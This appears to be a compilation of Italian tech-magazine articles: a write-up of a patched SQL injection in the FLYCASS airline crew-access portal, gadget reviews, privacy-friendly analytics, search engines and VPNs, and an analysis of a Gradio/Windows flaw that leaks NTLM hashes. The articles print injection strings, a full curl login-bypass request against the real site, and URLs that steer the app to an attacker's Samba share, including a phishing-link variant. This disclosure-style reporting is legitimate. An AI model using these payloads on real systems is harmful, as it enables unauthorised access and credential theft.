In italiano la parola “sicurezza”, almeno quando si parla di tecnologia, può essere ambigua. In effetti, utilizziamo la stessa parola per indicare sia quella che in inglese è “safety”, sia la “security”. Il problema è che sono due concetti differenti che spesso si sovrappongono, ma non sempre. E il caso più palese è l’aeronautica. Le decine di sistemi, sia l’avionica a bordo degli aeroplani che il controllo di volo a terra, sono progettati per garantire la “sicurezza” nel senso di safety: fare in modo che ogni aeroplano possa decollare e atterrare senza incidenti, anche in caso di malfunzionamento di alcuni componenti. Per questo motivo esistono molti meccanismi ridondanti e tutti scambiano informazioni liberamente. Così, se un sensore per il livello del carburante dovesse guastarsi, il computer può leggerne un altro. Se una linea di comunicazione con i martinetti idraulici si dovesse danneggiare si potrebbe usare un’altra. Persino i sistemi che inviano informazioni agli altri aerei, come l’ADS-B (che permette a ogni aereo di sapere quali altri aerei ci siano nelle vicinanze per evitare collisioni), comunicano nel modo più semplice e aperto possibile: più un sistema è complesso, maggiore è la probabilità che si blocchi per qualche errore non previsto.
Chi vede le cose dal punto di vista della “sicurezza” intesa come cybersecurity, però, si rende conto immediatamente che c’è un problema: se un sistema è troppo semplice, sarà anche relativamente semplice da attaccare volontariamente.
Nel caso dell’ADS-B si è dimostrato che è possibile persino da terra generare dei segnali radio fittizi (ADS-B spoofing), dando agli aeroplani l’illusione di un cielo congestionato e mettere in crisi i piloti, mentre in realtà c’è un solo aereo in volo.
La differenza di fondo è questa: chi si occupa di safety cerca di proteggere i sistemi da un loro stesso fallimento, tipicamente dovuto a un difetto di progettazione non ancora scoperto; chi invece si occupa di security cerca di proteggere i sistemi da un attacco volontario da parte di qualche malintenzionato.

Provando a inserire qualche testo contenente apici si otteneva un messaggio di errore che indicava chiaramente la possibilità di una SQL injection. FONTE: https://ian.sh/tsa.

Dove 1 è uguale a 1

Tutto ciò che ruota attorno al mondo dell’aeronautica civile dondola in equilibrio tra safety e security, con un occhio sempre puntato all’aspetto economico: è pur sempre un business, le aziende cercano di risparmiare tempo e denaro dove possibile.
Un esempio sono alcune file speciali ai controlli di sicurezza dei grandi aeroporti internazionali, indicate spesso come KCM (Known Crew Member, personale di volo). Queste permettono a personale fidato come i piloti di passare i controlli molto velocemente, senza fare la fila che spetta ai normali passeggeri. Un meccanismo simile è il CASS, Cockpit Access Security System. Nel complesso si tratta di un protocollo che permette (tipicamente ai piloti) di salire su un aereo qualsiasi come “ospiti”, su un sedile nella cabina di pilotaggio. Così possono raggiungere l’aeroporto da cui dovranno partire per il prossimo volo anche se sui normali posti a sedere non è rimasto nemmeno uno spazio libero. Come vengono identificati i piloti? In linea di massima, ogni compagnia aerea ha il suo sistema gestionale per tenere una lista contenente tutti i nomi dei piloti. Poi, però, esistono anche degli aggregatori che offrono questo servizio, soprattutto per le linee aeree più piccole, che non hanno i fondi per sviluppare e mantenere un gestionale internamente: almeno negli USA, questo è il ruolo di FLYCASS. Le linee come Air Transport International ottengono una interfaccia Web dedicata, per esempio questo sito Internet.
A questa pagina c’è un form per il login, eseguito il quale gli utenti (che sono i responsabili del personale) possono aggiungere o rimuovere persone sulla lista KCM o CASS. Però c’è un form di login: si potrebbe supporre che, quindi, sia tutto sicuro fintanto che i vari utenti utilizzano password sicure.

E, invece, no: fino alla versione del sito precedente agli ultimi bugfix, questa pagina consentiva una SQL injection. E anche piuttosto banale: il campo email veniva inserito direttamente nella query, senza alcuna validazione.
Quindi era possibile scrivere nel campo una stringa del tipo:
‘ or ‘1’=’1

Per interrompere la stringa e di fatto sostituire la condizione con l’ovvio 1=1. E, a quel punto, bastava fare sostanzialmente la stessa cosa per la password, scrivendo:
‘) OR MD5(‘1’)=MD5(‘1

Non sappiamo esattamente quale fosse il codice del sito, ma probabilmente la query SQL era costruita in questo modo:
“where email = ‘” + usremail + “’ and password = MD5(‘” + usrpass + “’)”

Il risultato della SQL injection diventava questo:
“where email = ‘’ or ‘1’=’1’ and password = MD5(‘’) OR MD5(‘1’)=MD5(‘1’)”

In altre parole, questa semplice chiamata HTTP:
curl ‘https://flycass.com/ati/login’ -H ‘Origin: https://flycass.com’
-H ‘Content-Type: application/x-www-form-urlencoded’
-H ‘User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36’
-H ‘Referer: https://flycass.com/ati/?cmd=login’
–data-raw ‘_token=Im0wVENDOTufq4EmZHO3UjPkXdq2nnKr1vlsulUD&email=%27%20or%20%271%27%3D%271&password=%27%29%20OR%20MD5%28%271%27%29%3DMD5%28%271’

Il sito offriva così un accesso di amministrazione alla lista del personale per questa compagnia aerea. Il token si sessione si può ottenere con una prima chiamata GET generica alla pagina in questione. Non solo. Nel sistema non era previsto alcun meccanismo secondario di verifica: dopo la prima autenticazione, l’utente aveva accesso a qualunque cosa, inclusa la possibilità di aggiungere una persona qualsiasi all’elenco del personale autorizzato a saltare i controlli di sicurezza e ad accedere alle cabine degli aerei. Tutto questo semplicemente inserendo i dati anagrafici e una fotografia della persona in questione. I ricercatori di sicurezza (intesa come security) che si sono accorti del problema hanno provato ad aggiungere una persona arbitraria, quindi non un vero pilota, e la nuova lista dei passeggeri autorizzati contenente l’impostore è stata propagata nel giro di breve tempo senza che intervenissero ulteriori controlli.

Ottenuto l’accesso come amministratori, era possibile creare un nuovo utente, che vieniva automaticamente approvato per le liste KCM e CASS. FONTE: https://ian.sh/tsa.

Entità della vulnerabilità

L’effettivo impatto di questa vulnerabilità è complesso da valutare: si tratta di uno specifico errore di progettazione in un singolo sito web, se la cosa finisse lì sarebbe quasi irrilevante. Il problema è che la centralizzazione delle informazioni dei sistemi KCM e CASS rischi di amplificare questo tipo di vulnerabilità: se tutti gli aeroporti e le compagnie aeree si fidano dei dati che ricevono dai vari gestionali basta un piccolo bug come questo per mettere in pericolo l’intero sistema. Naturalmente, i responsabili della compagnia aerea (ATI, nell’esempio) possono accorgersi che è stata aggiunta una persona. Il problema è che non sappiamo se ci siano delle segnalazioni automatiche (o una conferma obbligatoria) all’aggiunta di un individuo nella lista degli autorizzati a salire sugli aerei, o se tutto sia lasciato alla solerzia della compagnia aerea.

La soluzione

Il problema è stato corretto modificando il sistema di login, prevedendo una validazione dei campi per evitare SQL injection.
Non sappiamo se sia anche stato sviluppato un meccanismo di permessi per fare in modo che solo alcuni utenti possano modificare le liste aggiungendo passeggeri autorizzati. Ciò che è certo è che risulta, che questo specifico bug non è più sfruttabile. Non sappiamo poi se altri siti web che offrono servizi simili alle piccole compagnie aeree possano avere bug simili: la vulnerabilità di fondo dei sistemi KCM e CASS, infatti rimane. E questo proprio perché sono sistemi progettati per “fidarsi” delle compagnie aeree e delle loro basi di dati, per garantire la “safety” piuttosto che la “security”.

A cura di Luca Tringali

Leggi anche: “Database: l’SQL Injection è dietro l’angolo“

Il FRITZ!Box 7690 di AVM prosegue la serie di modem/router altamente affidabili e configurabili dell’azienda tedesca.
Se la novità più eclatante è l’introduzione del Wi-Fi 7, in realtà porta con sé diversi aggiornamenti interessanti.

In casa o in ufficio

Il 7690 è compatibile sia con le linee ADSL che con quelle in fibra. La sua estetica è la stessa degli ultimi modelli e fa la sua bella figura, pur non essendo un campione di design. Sul retro e sul fianco si trovano diverse porte. Nella prima da sinistra va inserito il doppino telefonico dell’ADSL. Poi troviamo due porte analogiche RJ11 per il collegamento di due telefoni e una porta Ethernet blu a 2,5 Gbit chiamata WAN (a cui collegare l’ONT, se si ha la fibra, oppure da usare come una normale porta di rete se si ha l’ADSL). Seguono altre tre porte Ethernet, una ancora a 2,5 Gbit e due a 1 Gbit. Su un fianco c’è invece una porta USB 2.0 per collegare un disco, una stampante da condividere in rete o una chiavetta 4G USB. Il FRITZ!Box supporta le connessioni VDSL e ADSL 2+ fino a 300 Mbit/s. Per la sezione telefonica, questo router supporta anche sei telefoni DECT, con tanto di centralino telefonico, e questo è uno dei motivi per cui lo pensiamo adatto anche ai piccoli uffici.

Uno dei segreti del successo dei prodotti di AVM è il sistema operativo FRITZ!OS. L’ultima versione, la 8, porta oltre 60 nuove funzionalità e miglioramenti, impossibile elencarle tutte. Ma trovate le principali qui: https://it.fritz.com/prodotti/fritzos/fritzos-8/

Wi-Fi 7 e Zigbee

L’implementazione del Wi-Fi 7 è stata fatta su due bande, 2,4 GHz e 5 GHz, non sulla 6 GHz e bisogna dire che il nuovo protocollo offre prestazioni superiori rispetto ai Wi-Fi precedenti anche grazie all’implementazione 4×4, cioè con otto antenne. Il nuovo protocollo Wi-Fi torna molto utile a chi ha tanti dispositivi domotici e anche ai videogiocatori online. L’altra faccia della medaglia è che la copertura è leggermente inferiore rispetto al Wi-Fi 6. A sopperire questo interviene però la tecnologia Mesh: acquistando, per esempio, i nuovi ripetitori Wi-Fi 7 di AVM si
può estendere la propria rete wireless in maniera davvero semplice. Il router ora supporta Zigbee e in futuro arriverà anche la compatibilità con Matter, per gli amanti della Smart Home. Tra gli altri miglioramenti, abbiamo consumi energetici inferiori e una potenza maggiore così da gestire senza problemi connessione Internet e tanti dispositivi collegati.

SPECIFICHE

DSL/fibra: supporto al supervectoring 35b fino a 300 Mbit/s; serve ONT per la fibra
Wi-Fi: Mesh Wi-Fi, 4×4 su 5 GHz e 2,4 GHz / Wi-Fi 7 con velocità fino a 5,760 Mbit/s (5 GHz), fino a 1,376 Mbit/s (2,4 GHz)
Porte: 1 Ethernet 2,5 Gbit/s LAN/ WAN, 1 Ethernet 2,5 Gbit/s LAN, 2 Ethernet LAN 1 Gbit/s, 1 USB per chiavette 4G/5G, dischi e stampanti
Telefonia: DECT, IP/SIP e 2 connessioni telefoniche analogiche
Smart Home: DECT ULE e Zigbee, Matter in arrivo

KINGSTON IRONKEY LOCKER+ 50
PER LA MASSIMA SICUREZZA DEI DATI

Grazie alla crittografia hardware XTS-AES a 256 bit, protegge le informazioni da accessi non autorizzati e attacchi informatici, assicurando un elevato livello di protezione. Una delle sue caratteristiche principali è il sistema multi-password, che permette di impostare credenziali diverse per amministratori e utenti. Inoltre, la modalità passphrase consente di utilizzare password più lunghe e intuitive, migliorando la sicurezza senza sacrificare la praticità. Dotata di interfaccia USB 3.2 Gen 1, offre velocità di lettura fino a 145 MB/s e di scrittura fino a 115 MB/s, garantendo trasferimenti rapidi ed efficienti. È compatibile con servizi cloud come Google Drive, OneDrive e Dropbox e permette un backup automatico dei dati, rendendola una soluzione flessibile per professionisti e aziende. La chiavetta è compatibile con Windows e macOS, e il suo design in metallo la rende resistente e durevole. La garanzia è di 5 anni.

Quanto costa: € 41
Dove acquistarlo: su Amazon

BREESHY
DECRITTOGRAFIA DI SCHEDE IC
Il Breeshy Rilevatore di Controllo Accessi è un dispositivo avanzato progettato per la simulazione di hacking e la decrittografia di schede IC. Dotato di una potente capacità di rilevamento multisettoriale, permette di analizzare e gestire contemporaneamente più accessi, garantendo un’elevata precisione nei processi di lettura e scrittura. Una delle sue caratteristiche distintive è la capacità di decifrare mappe nazionali completamente crittografate, un’operazione che strumenti tradizionali come Proxmark non riescono a eseguire. Inoltre, il dispositivo può archiviare fino a otto schede IC con capacità da 1 a 4K, facilitando la simulazione di comunicazione e il trasferimento dei dati. Compatibile con ACR122, Proxmark3, Icopy3 e altri dispositivi noti per la gestione delle schede IC, il Breeshy offre un supporto avanzato per operazioni che solitamente richiedono strumenti altamente specializzati. La batteria integrata garantisce un’ampia autonomia, mentre l’interfaccia grafica su PC semplifica l’utilizzo grazie a un sistema di calcolo automatico dei risultati.

Quanto costa: € 37
Dove acquistarlo: su Amazon

CAMBIA VOCE PORTATILE
QUELLA VOCE NON È MIA!

Sembra un gioco, ma è molto di più. Questo cambia-voce portatile è un dispositivo innovativo, in grado di applicare ben 11 effetti vocali diversi. Può trasformare la voce in tempo reale in varie tonalità: da maschile a femminile, da bambino a robot, passando per altre varianti divertenti e creative. Grazie al display a colori integrato, l’uso risulta estremamente intuitivo: l’effetto selezionato viene mostrato chiaramente sullo schermo, rendendo immediata la gestione e il cambio delle voci. La qualità del suono è stata ottimizzata grazie a un algoritmo avanzato, che permette regolazioni di precisione per rendere il cambiamento di voce più realistico. La sua ampia compatibilità lo rende utilizzabile con il 99% delle applicazioni, supportando sistemi Android, iOS e diverse piattaforme di streaming live, karaoke e gaming.

Quanto costa: € 26
Dove acquistarlo: su Amazon

Leggi anche: “I gadget dell’hacker – mese aprile“

Per l’analisi del traffico dei siti, Google Analytics è la soluzione più diffusa, ma presenta diverse criticità in termini di privacy ed etica. Il trasferimento dei dati negli Stati Uniti contrasta con il GDPR e può esporre gli utenti alla sorveglianza governativa, mentre il tracciamento invasivo e la profilazione degli utenti attraverso cookie e tecniche alternative, come il fingerprinting, sollevano preoccupazioni sulla raccolta eccessiva di dati. Inoltre, i proprietari dei siti non hanno pieno controllo sui dati, che vengono elaborati da Google e utilizzati per scopi pubblicitari. Il modello di business di Google Analytics si basa, infine, sulla monetizzazione delle informazioni raccolte ed è in contrasto con i principi di privacy by design del GDPR. Diverse autorità europee per la protezione dei dati, come quelle di Francia, Austria e Italia, hanno dichiarato problematica l’adozione di Google Analytics senza adeguate misure di protezione. Questi fattori rendono rischioso il suo utilizzo per le aziende e i professionisti che vogliono rispettare la privacy degli utenti e restare conformi alle normative europee, ma ci sono ottime alternative.

Una soluzione leggera e Open Source

Plausible Analytics è una piattaforma Open Source estone per l’analisi Web, progettata per offrire un’alternativa semplice, leggera e rispettosa della privacy a strumenti come Google Analytics. Non utilizza cookie e non raccoglie dati personali o informazioni identificabili, garantendo così la conformità alle normative sulla privacy come il GDPR e il CCPA. Tutte le misurazioni del sito vengono effettuate in modo completamente anonimo, senza l’uso di identificatori persistenti o tracciamenti incrociati tra siti o dispositivi. Plausible offre un’interfaccia intuitiva che consente di visualizzare tutte le statistiche essenziali in una singola pagina, facilitando la comprensione del traffico del sito senza la necessità di formazione specifica, e permette di monitorare metriche come le visualizzazioni di pagina, le visite uniche, la durata media della sessione e le fonti di traffico. Inoltre, supporta il tracciamento delle conversioni, l’analisi delle campagne utilizzando parametri UTM e l’integrazione con Google Search Console per una visione completa delle performance del sito. Un altro vantaggio significativo di Plausible è la leggerezza del suo script di tracciamento, che pesa meno di 1 KB. Questo riduce il peso complessivo delle pagine Web, contribuendo a tempi di caricamento più rapidi e a un’esperienza utente migliorata. Offre anche un plug-in Open Source per
WordPress.

L’interfaccia completamente in italiano, oltre alla ricca documentazione nella nostra lingua e ai numerosi strumenti forniti, rendono Vantevo uno strumento potente ma relativamente semplice da usare

Una proposta italiana

Vantevo Analytics è una piattaforma italiana concepita come alternativa a Google Analytics, con un forte focus sulla privacy degli utenti e la conformità al GDPR. La piattaforma non utilizza cookie e non raccoglie dati personali, eliminando la necessità di banner per il consenso e garantendo un monitoraggio rispettoso della
privacy. Le sue funzionalità includono l’analisi delle tendenze di traffico, il comportamento degli utenti e il monitoraggio delle conversioni. L’integrazione è facilitata da plug-in disponibili per piattaforme come WordPress e Shopify, oltre a SDK ufficiali per linguaggi come PHP e JavaScript, disponibili su GitHub. Vantevo ospita i propri server all’interno dell’Unione Europea, assicurando che i dati siano trattati in conformità con le nostre leggi, e il modello di business si basa su abbonamenti a pagamento, evitando la monetizzazione dei dati degli utenti attraverso terze parti. La sua compatibilità è ampia, grazie alla possibilità di integrarsi con qualsiasi piattaforma Web e backend. La ricca documentazione ufficiale in italiano e le risorse disponibili, come le API per registrare visualizzazioni di pagine ed eventi personalizzati lato server, facilitano l’implementazione su diversi sistemi operativi e
ambienti di sviluppo.

Leggi anche: “Hacker sfruttano Google Analytics per rubare carte di credito”

*illustrazione articolo progettata da Freepik

Google e colossi analoghi memorizzano ogni ricerca associandola a un account o a un indirizzo IP per personalizzare i risultati e mostrare annunci mirati. Il regolamento GDPR presente in Europa impone restrizioni più severe sulla raccolta e il trattamento delle informazioni personali degli utenti, quindi la vostra cronologia delle ricerche e i dati di navigazione non vengono tracciati per creare profili dettagliati. Vale la pena, allora, di valutare i motori di ricerca europei!

Privacy e risultati senza filtri

Qwant è un motore di ricerca francese che pone al centro della sua missione la tutela della privacy degli utenti e la neutralità nei risultati di ricerca. Non traccia le vostre attività online, non memorizza le ricerche effettuate e non utilizza cookie per scopi pubblicitari. Inoltre, i risultati non sono personalizzati ma ordinati per pertinenza e i suoi algoritmi non favoriscono siti o contenuti specifici, rendendo più facile per tutti arrivare nelle prime posizioni dei risultati di ricerca. In questo modo, come sottolinea il suo sito, si evitano le gabbie di filtri che intrappolano le persone mostrando loro sempre più idee simili a quelle da cui sono partite (perché quelle contrarie vengono nascoste) o offrendo prodotti solo sulla base del loro presunto potere d’acquisto. Qwant integra anche nel motore di ricerca un modello di Intelligenza Artificiale e offre un’estensione per Chrome e una per Mozilla Firefox (dal codice Open Source) per impostarlo come motore di ricerca predefinito e bloccare i tracker online. C’è, inoltre, Qwant Lite, una versione del motore di ricerca destinata a browser più datati, dispositivi meno recenti e connessioni Internet a bassa velocità. Infine, nel novembre 2024, Qwant ha annunciato una collaborazione con il motore di ricerca tedesco Ecosia per sviluppare un indice di ricerca europeo indipendente, con l’obiettivo di ridurre ulteriormente la dipendenza dalle API di Microsoft e Google. Questa iniziativa mira a rafforzare la sovranità digitale europea e a promuovere l’innovazione tecnologica locale.

La schermata principale del motore di ricerca francese Qwant, che si focalizza sulla privacy degli utenti senza tracciare le ricerche o raccogliere dati personali. Le impostazioni permettono di modificare vari parametri e ci sono estensioni per Chrome e Firefox

Più tutela e supporto all’ecologia

Ecosia ha sede a Berlino e la sua missione principale è utilizzare i profitti derivanti dalle ricerche degli utenti per finanziare progetti di riforestazione in tutto il mondo. Ha contribuito a piantare centinaia di milioni di alberi in più di 35 Paesi, tra cui Brasile, Senegal e Indonesia. I risultati delle ricerche sono forniti principalmente da Bing, integrati con l’algoritmo proprietario di Ecosia per garantire pertinenza e qualità. Le ricerche sono criptate, non vengono memorizzate permanentemente, e l’azienda non vende dati a inserzionisti terzi. Inoltre, Ecosia non crea profili personali basati sulla cronologia delle ricerche e non utilizza strumenti di tracciamento esterni come Google Analytics. Potete impostarlo come motore di ricerca predefinito su Firefox, Chrome e altri browser scaricando l’estensione dedicata dal rispettivo app store. Per dispositivi mobili, Ecosia ha sviluppato un proprio browser basato su Chromium.

Una VPN senza VPN

Startpage è un motore di ricerca con sede nei Paesi Bassi che mette al centro la privacy degli utenti. Fa da intermediario tra voi e motori come Google e Bing tutelando la vostra riservatezza. Non memorizza gli indirizzi IP e la cronologia delle ricerche e non utilizza tracker per monitorare il comportamento online. Offre, inoltre, una modalità anonima per visitare i siti presenti nei risultati di ricerca attraverso un proxy integrato, nascondendo il vostro indirizzo IP sia su dispositivi desktop sia mobili e operando in modo simile a una VPN. Per usarla, basta fare clic sull’icona della mascherina accanto al sito che volete visitare. Dato che utilizza una connessione HTTPS protetta, consente di mantenere la privacy anche su reti non sicure, come quelle di aeroporti, stazioni e locali pubblici.

Leggi anche: “Il pericolo corre sul browser”

*illustrazione articolo progettata da Freepik

Con le VPN, più ancora che in altri settori, affidarsi a una società americana o di un colosso internazionale comporta rischi per la privacy e la sicurezza dei dati. Leggi statunitensi come il Cloud Act e il Patriot Act possono obbligare
le aziende a consegnare informazioni agli enti governativi, anche se dichiarano una politica no-log. Molte VPN internazionali fanno, inoltre, parte di gruppi con interessi pubblicitari, mettendo a rischio la riservatezza degli utenti. L’infrastruttura dei server può essere meno sicura, con dati ospitati in Paesi con regolamenti poco trasparenti. Alcune VPN hanno rimosso nodi o limitato l’accesso a certi servizi su pressione di governi, compromettendo la libertà online, e i colossi tecnologici danno spesso priorità alla crescita del numero di utenti, trascurando audit indipendenti e un controllo rigoroso sulla protezione dei dati. Per fortuna ci sono varie alternative europee, che offrono maggiore trasparenza, infrastrutture più sicure e una vera politica no-log.

Mullvad VPN per una soluzione integrata

Mullvad VPN è un servizio Open Source sviluppato in Svezia che non richiede la creazione di un account con dati personali. Il sistema assegna un codice numerico anonimo agli utenti, eliminando la necessità di fornire indirizzi email o altre informazioni identificative. Utilizza i protocolli WireGuard e OpenVPN, assicurando connessioni veloci e sicure. Il traffico è crittografato e l’azienda adotta una rigorosa politica no-log, impedendo la memorizzazione di qualsiasi informazione sulle attività degli utenti. L’infrastruttura è composta da server distribuiti in diverse nazioni, tutti gestiti direttamente da Mullvad o da partner affidabili. L’azienda accetta pagamenti anonimi, con criptovalute e contanti, permettendo di acquistare il servizio senza lasciare tracce digitali. Il client VPN è disponibile per Linux, Windows, macOS, Android e iOS, con un’interfaccia semplice e intuitiva che facilita l’utilizzo anche per chi non ha esperienza. Mullvad non utilizza strumenti di tracciamento nel sito e ha superato numerosi audit di sicurezza indipendenti. Offre anche un browser mirato alla massima tutela della privacy.

Mullvad VPN è un servizio svedese e non richiede la creazione di un account con dati personali. Il traffico è crittografato e l’azienda adotta una rigorosa politica no-log

Dagli scienziati del CERN

Proton VPN è un servizio Open Source sviluppato da Proton AG (fondata da scienziati del CERN), i creatori del noto servizio di posta elettronica crittografata Proton Mail. La loro VPN è progettata per garantire privacy, sicurezza e trasparenza, offrendo una delle protezioni più avanzate contro la sorveglianza online. Essendo basato in Svizzera, il servizio è soggetto a rigide leggi sulla protezione dei dati, ancora più restrittive rispetto al GDPR. La Svizzera non fa parte delle alleanze di sorveglianza come Five Eyes o Fourteen Eyes, il che significa che Proton VPN non è obbligato a condividere dati con governi stranieri. Utilizza crittografia AES-256, supporta i protocolli WireGuard e OpenVPN e integra un Kill Switch, protezione contro DNS leaks e la funzione Tor over VPN, che consente un accesso sicuro alla rete Tor direttamente dalla VPN. La tecnologia Secure Core permette di far passare il traffico attraverso server sicuri situati in Paesi con normative sulla privacy molto restrittive, come Svizzera, Islanda e Svezia, prima di accedere a Internet, rendendo più difficile qualsiasi tentativo di sorveglianza. Il servizio è disponibile per Linux, Windows, macOS, Android e iOS.

Specializzati nello streaming

GOOSE VPN è un servizio con sede nei Paesi Bassi, progettato per garantire privacy online e accesso a contenuti con restrizioni geografiche. Una delle sue principali caratteristiche è l’ottimizzazione per lo streaming, che permette agli
utenti di guardare le proprie serie e film preferiti su tutte le piattaforme più note, senza limitazioni o ritardi, indipendentemente dalla propria posizione geografica. Il codice è proprietario ma i prezzi sono competitivi e c’è un’opzione lifetime.

Leggi anche: “Intallare Pronton VPX su Linux”

*illustrazione articolo progettata da Freepik

Se si pensa a un framework Python per lo sviluppo di applicazioni Web, normalmente si pensa a Django. Ma la realtà è che ne esistono diversi, decisamente più “piccoli” e semplici ma che stanno avendo un notevole successo. E questo proprio grazie alla loro semplicità. Uno di questi si chiama Gradio, e sta diventando quasi uno standard tra tutte le nuove app basate su intelligenza artificiale. L’interfaccia Web di Stable Diffusion, per esempio, è realizzata con Gradio, così anche molto interfacce per l’utilizzo domestico di Whisper, oppure di modelli linguistici generativi alternativi a ChatGPT. In ambito enterprise, questi servizi vengono naturalmente forniti da server GNU/Linux, configurati in cluster ad alta affidabilità e con risorse enormi. Tuttavia, ormai la maggioranza delle reti neurali “moderne” è in grado di funzionare anche su hardware consumer: le schede Nvidia della serie 30xx o 40xx sono in grado di far girare software per l’AI generativa. Queste schede sono spesso acquistate degli appassionati di videogame, ma ormai va di moda “giocare” anche con un generatore di immagini, testo o audio. Proprio perché si utilizza un computer desktop, è probabile che il sistema operativo utilizzato sia Windows, che è il più diffuso tra i gamer. Questo significa che si utilizza Python su Windows, con una applicazione Web che per sua natura è esposta alla rete locale del PC, e che ha privilegi di amministrazione (per poter accedere direttamente alla scheda grafica).

Il controllo is_dir() sul percorso, che paradossalmente dovrebbe renderlo sicuro, in realtà innesca la condivisione dell’hash NTLM. Fonte: https://github.com.

FILE NON MOLTO STATICI

Gradio espone delle API, che vengono utilizzate dall’interfaccia Web per eseguire operazioni in background. Per esempio, l’API file consente l’upload di file in una cartella predefinita nella configurazione dell’app. Di default, questa API è disponibile senza autenticazione, per facilitare l’utilizzo: la “sicurezza” è affidata all’idea che, comunque vada, i file verranno caricati dentro una cartella predisposta dallo sviluppatore per ricevere file, quindi si suppone che chi ha attivato l’applicazione abbia già previsto di “isolare” questa cartella con apposite regole. Per esempio, dandole una dimensione massima o prevedendo una pulizia periodica per eliminare tutto quello che non dovrebbe essere presente (file vecchi o che non sembrano legittimi). Per assicurarsi che il file esista e che la cartella sia autorizzata, Gradio utilizza il metodo Python:

Path.is_dir()

che verifica se esista la cartella genitore, e se al suo interno ci sia un oggetto di tipo “cartella” (e non semplicemente file) col nome della cartella richiesta. C’è solo un piccolo problema: Windows cerca di risolvere automaticamente i percorsi di rete, che nella sua sintassi vengono scritti semplicemente con un \\ iniziale. Quindi se qualcuno scrivesse:

http://IPapplicazione/file=\\
IPrisorsadirete\share

Basta fare una chiamata HTTP verso l’applicazione Gradio e il server Samba malevolo riceve l’hash della password dell’utente. FONTE: https://www.horizon3.ai.
Python proverebbe innanzitutto ad accedere alla risorsa di rete, a prescindere da quanto la richiesta possa essere legittima (questo viene controllato dopo).
Questo non accade su sistemi GNU/Linux, perché la sintassi dei percorsi di rete e il comportamento del sistema sono differenti. E Gradio è stato pensato principalmente per sistemi Unix, pur funzionando anche su Windows. Ma qual è il problema del tentativo di accedere a una risorsa di rete? Alla fine, se si cerca di accedere a qualche risorsa che è già pubblica il malintenzionato non ha ottenuto molto. E, invece, se la risorsa richiede autenticazione non ci può accedere comunque. Ma il vero problema è ben più grave: Windows sembra ossessionato dal cercare di far arrivare l’utente su qualunque risorsa desideri, persino facendo un login su server remoti, se necessario. O, almeno, provando a farli. Questo significa che un malintenzionato che trova una app Gradio sulla propria rete può mettere in piedi un falso server Samba con condivisione di file, che richieda autenticazione. E poi interrogare l’app Gradio per farsi dare un file presente sul suo server Samba. Il risultato è ovvio: Python cercherà di accedere alla risorsa di rete e Windows, con la sua mania di “semplificare” le cose, farà automaticamente un tentativo di login, inviando l’hash delle credenziali dell’utente che sta facendo girare l’app Gradio, nella speranza che quelle credenziali siano valide anche per l’accesso alla risorsa di rete. Il server fasullo registrerà l’hash NTLM (hash di autenticazione di Windows), e il malintenzionato avrà lo strumento perfetto per iniziare a fare il brute force della password.
Ci si potrebbe chiedere: quindi basta attivare l’autenticazione anche per l’API file di Gradio? In realtà no, perché è comunque possibile accedere ai file che dovrebbero essere pubblici con un percorso del tipo:

http://IPapplicazione/
static///IPrisorsadirete/
share

Che, almeno nelle versioni di Python per Windows precedenti alla 3.11, viene tradotto nel percorso:

\\IPrisorsadirete\share

Che poi Windows cercherà di esplorare, esattamente come abbiamo visto per l’API file. C’è ancora un piccolo dettaglio da considerare: questa vulnerabilità di Gradio deriva in realtà da Werkzeug, un server WSGI Python su cui si basa Gradio. Teoricamente, visto che la funzione per l’accesso ai file statici deriva da esso, tutte le applicazioni Python basate su Werkzeug sono vulnerabili (anche il famoso Flask in modalità sviluppo, per esempio).
In patica, la reale possibilità di sfruttare la vulnerabilità dipende dall’implementazione, e quella di Gradio sembra l’unica regolarmente vulnerabile di default. Nel caso di Flask, per esempio, dipende se si consenta all’utente di chiedere file “a piacere”, o se invece i file forniti facciano parte di una lista definita lato server. Gradio non pone limiti sui nomi dei file perché in questo modo è molto più facile sviluppare l’applicazione senza dover configurare nei dettagli l’accesso ai file (che potrebbero essere l’output dell’elaborazione dell’AI su cui si basa l’app). Ma, come spesso accade, questa semplicità si paga in termini di sicurezza.

LA VULNERABILITA’

Bisogna innanzitutto considerare che questa vulnerabilità non colpisce i server: considerando che Gradio è utilizzato soprattutto per applicazioni Web che sfruttano modelli di intelligenza artificiale, di solito i server che le ospitano sono grossi cluster GNU/Linux con adeguati meccanismi di protezione. Le vittime più probabili sono semplici appassionati o studenti che sviluppano nuove applicazioni. Per poter sfruttare questa vulnerabilità il malintenzionato deve essere nella stessa rete locale della vittima: il server Samba malevolo può anche essere esposto sulla WAN da parte del pirata, ma questo deve in qualche modo poter fare una chiamata HTTP verso l’applicazione, che sarà presumibilmente eseguita su un PC personale ed esposta su tutti gli indirizzi IP di quel computer, IP LAN incluso.
La vulnerabilità è quindi abbastanza limitata, anche se non si può escludere che l’utente venga indotto a fare egli stesso la chiamata; basterebbe infatti una email di phishing con un link che punta a un indirizzo del tipo:

http://localhost/static///
IPWANSambaMalevolo/share

E l’attacco avrebbe successo. Bisogna anche considerare che il malintenzionato otterrebbe l’hash NTLM, e dovrebbe comunque poi procedere con un bruteforce della password: se l’utente ha scelto una password sufficientemente sicura, il pericolo è tutto sommato ridotto.

LA SOLUZIONE

Il problema principale è risolto se si utilizza Python 3.12: in questa versione la funzione Path.is_dir() si accorge della presenza di un percorso di rete e lo ignora. Gradio non ha previsto fix specifici, proprio perché in realtà il problema era legato alla libreria Python, il framework web era soltanto uno strumento per sfruttare il bug e ora che è risolto il problema non si pone più. Riguardo al problema di fondo, cioè il fatto che Windows cerchi di autenticarsi anche su share di rete di cui non dovrebbe fidarsi, non è risolvibile: in fondo, per Windows questo non è affatto un bug, è una feature.

Leggi anche: “Windows sotto attacco“